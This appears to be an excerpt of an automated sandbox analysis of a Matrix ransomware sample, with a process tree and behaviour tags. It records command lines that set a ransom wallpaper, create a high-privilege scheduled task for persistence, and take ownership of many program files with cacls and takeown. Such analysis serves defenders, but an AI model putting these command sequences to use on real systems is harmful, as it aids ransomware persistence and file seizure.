wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1305 PID 548 wrote to memory of 216 548 cmd.exe 1307 PID 548 wrote to memory of 216 548 cmd.exe 1307 PID 548 wrote to memory of 216 548 cmd.exe 1307 PID 548 wrote to memory of 216 548 cmd.exe 1307 PID 548 wrote to memory of 524 548 cmd.exe 1308 PID 548 wrote to memory of 524 548 cmd.exe 1308 PID 548 wrote to memory of 524 548 cmd.exe 1308 PID 548 wrote to memory of 524 548 cmd.exe 1308 PID 548 wrote to memory of 1472 548 cmd.exe 1309 PID 548 wrote to memory of 1472 548 cmd.exe 1309 PID 548 wrote to memory of 1472 548 cmd.exe 1309 PID 548 wrote to memory of 1472 548 cmd.exe 1309 PID 1472 wrote to memory of 908 1472 cmd.exe 1310 PID 1472 wrote to memory of 908 1472 cmd.exe 1310 PID 1472 wrote to memory of 908 1472 cmd.exe 1310 PID 1472 wrote to memory of 908 1472 cmd.exe 1310 PID 548 wrote to memory of 364 548 cmd.exe 1311 PID 548 wrote to memory of 364 548 cmd.exe 1311 PID 548 wrote to memory of 364 548 cmd.exe 1311 PID 548 wrote to memory of 364 548 cmd.exe 1311
Processes
-
C:\Users\Admin\AppData\Local\Temp\095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe"C:\Users\Admin\AppData\Local\Temp\095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe" "C:\Users\Admin\AppData\Local\Temp\NWgvgGUu.exe"2⤵PID:1916
-
-
C:\Users\Admin\AppData\Local\Temp\NWgvgGUu.exe"C:\Users\Admin\AppData\Local\Temp\NWgvgGUu.exe" -n2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1936
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\tlpUxQ1t.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\tlpUxQ1t.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:760
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:1816
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:744
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\wU1oBZhN.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\wU1oBZhN.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\3UeOqcQE.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\3UeOqcQE.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1180
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1080
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵PID:836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs64.exeB4ux2Scs.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Modifies service
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:1924 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:1064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:1436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1644
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:360
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:1952 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵PID:1384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:472 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1128
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:1840 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1244 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2044
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:548 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵PID:1784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:700 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:436
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:1736 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1244
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1572 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:992
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""2⤵
- Loads dropped DLL
PID:320 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C3⤵PID:548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Journal.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Journal.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:1032
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""2⤵
- Loads dropped DLL
PID:992 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C3⤵PID:1940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Genko_1.jtp" -nobanner3⤵
- Loads dropped DLL
PID:436 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Genko_1.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1128
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""2⤵
- Loads dropped DLL
PID:1244 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C3⤵PID:1840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "To_Do_List.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1848 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "To_Do_List.jtp" -nobanner4⤵
- Executes dropped EXE
PID:360
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵
- Loads dropped DLL
PID:1896 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:524
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵
- Loads dropped DLL
PID:1756 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵
- Modifies file permissions
PID:1220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵
- Loads dropped DLL
PID:980 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵
- Executes dropped EXE
PID:992
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵
- Loads dropped DLL
PID:1636 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:2044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "LogTransport2.exe" -nobanner3⤵
- Loads dropped DLL
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "LogTransport2.exe" -nobanner4⤵
- Executes dropped EXE
PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵
- Loads dropped DLL
PID:472 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵
- Modifies file permissions
PID:1032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "AcroSign.prc" -nobanner3⤵
- Loads dropped DLL
PID:992 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "AcroSign.prc" -nobanner4⤵
- Executes dropped EXE
PID:1384
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵
- Loads dropped DLL
PID:1052 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:1940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:1080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "email_all.gif" -nobanner3⤵
- Loads dropped DLL
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "email_all.gif" -nobanner4⤵
- Executes dropped EXE
PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵
- Loads dropped DLL
PID:1636 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵PID:1032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "info.gif" -nobanner3⤵
- Loads dropped DLL
PID:548 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "info.gif" -nobanner4⤵
- Executes dropped EXE
PID:1384
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵
- Loads dropped DLL
PID:1896 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:1080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "review_browser.gif" -nobanner3⤵
- Loads dropped DLL
PID:1848 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "review_browser.gif" -nobanner4⤵
- Executes dropped EXE
PID:224
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵
- Loads dropped DLL
PID:1468 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "stop_collection_data.gif" -nobanner3⤵
- Loads dropped DLL
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "stop_collection_data.gif" -nobanner4⤵
- Executes dropped EXE
PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵
- Loads dropped DLL
PID:1840 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵PID:756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵
- Loads dropped DLL
PID:1128 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵
- Executes dropped EXE
PID:700
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵
- Loads dropped DLL
PID:980 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:1068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵
- Loads dropped DLL
PID:320 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵
- Executes dropped EXE
PID:1032
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵
- Loads dropped DLL
PID:756 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵PID:216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵
- Loads dropped DLL
PID:700 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵
- Executes dropped EXE
PID:524
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵
- Loads dropped DLL
PID:220 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:1960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵PID:364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "SC_Reader.exe" -nobanner3⤵
- Loads dropped DLL
PID:1032 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "SC_Reader.exe" -nobanner4⤵
- Executes dropped EXE
PID:1948
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵
- Loads dropped DLL
PID:1820 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:2044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵PID:992
-
-
